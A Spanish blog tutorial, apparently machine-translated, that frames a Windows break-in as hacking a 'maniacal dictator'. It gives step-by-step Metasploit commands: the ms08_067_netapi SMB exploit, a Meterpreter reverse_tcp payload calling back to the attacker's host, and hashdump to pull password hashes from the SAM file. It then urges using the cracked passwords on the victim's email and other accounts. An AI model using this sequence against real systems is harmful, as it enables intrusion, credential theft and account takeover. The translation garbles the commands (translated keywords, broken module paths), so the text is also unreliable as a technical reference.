BlogHack Like a Pro

Hackear como un profesional Cómo obtener contraseñas cifradas de forma remota desde una computadora comprometida

¡Bienvenidos de nuevo, mis hackers novatos!

Hay un dictador malvado empeñado en destruir el mundo, y en uno de nuestros últimos ataques, comprometimos con éxito su computadora y salvamos al mundo de la aniquilación nuclear. Luego, cubrimos nuestras pistas para que nadie supiera lo que hicimos, y desarrollamos un truco para capturar capturas de pantalla de su computadora periódicamente para que pudiéramos rastrear lo que estaba haciendo a continuación.

Con este nuevo truco, capturaremos las contraseñas de la computadora del dictador maníaco para que podamos acceder a su PC a través de su cuenta, o la cuenta de cualquier otra persona en su computadora, incluida la cuenta más importante, la del administrador del sistema.

Los sistemas Windows almacenan contraseñas en forma cifrada dentro de un archivo llamado archivo SAM. Este archivo reside en el c: windows system32 config sam directorio. Si podemos obtener acceso a su computadora, como ya lo hemos hecho, podemos tomar una copia de las contraseñas encriptadas, transferirlas a nuestra computadora y luego descifrarlas más tarde en nuestro tiempo libre.

Entonces, activemos nuestra confiable herramienta de piratería de marcos, Metasploit, ¡y tomemos esas contraseñas!

Paso 1: comprometer el sistema

Una vez más, usemos un exploit probado y verdadero; tipo:

  • msf> use exploit / windows / smb / ms08_067_netapi

Ahora, configuremos la carga útil para nuestro todopoderoso Meterpreter.

  • msf (ms08_067_netapi)> establecer carga útil / windows / meterpreter / reverse_tcp

Siempre es una buena idea comprobar nuestras opciones.

Como puede ver, necesitaremos tanto LHOST (la dirección IP de nuestra computadora) como RHOST (la dirección IP de la computadora víctima). Establezcamos estos ahora.

  • msf (ms08_067_netapi)> establecer RHOST 192.168.1.108
  • msf (ms08_067_netapi)> establecer LHOST 192.168.1.109

Con todo listo, ¡ahora todo lo que queda por hacer es explotar!

  • msf (ms08_067_netapi)> explotar

¡Ahora tenemos un indicador de terminal Meterpreter en la computadora del dictador maníaco!

Paso 2: toma el archivo de contraseña

Como has visto en mis tutoriales anteriores, el Meterpreter tiene varios scripts potentes integrados. En este caso, usaremos uno llamado hashdump.

Solo una pequeña explicación antes de tomar esas contraseñas …

Por motivos de seguridad, la mayoría de los sistemas operativos (incluidos todos los sistemas operativos modernos de Windows) almacenan las contraseñas de los usuarios en hash. Este es un cifrado unidireccional que hace que las contraseñas sean ilegibles para los humanos. Estos son los hash que buscamos, por lo que el script se llama hashdump.

Entonces, ¡sigamos adelante y obtengamos esos hash!

Como puede ver, ahora tenemos varios usuarios y sus hashes de contraseñas cifradas. Por supuesto, en este momento no podemos leerlos, pero regrese para mi próximo tutorial y le mostraré cómo descifrarlos para que podamos usarlos en nuestro tiempo libre.

Recuerde, una vez que tengamos la contraseña del dictador maníaco, es probable que use la misma contraseña en sistemas distintos a este (es decir, correo electrónico, áreas seguras, etc.), lo que nos da acceso a muchos de sus activos seguros.

Fotos por Andrey Popov / Shutterstock, Rob Hyrons / Shutterstock, Maksim Kabakou / Shutterstock

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba
Cerrar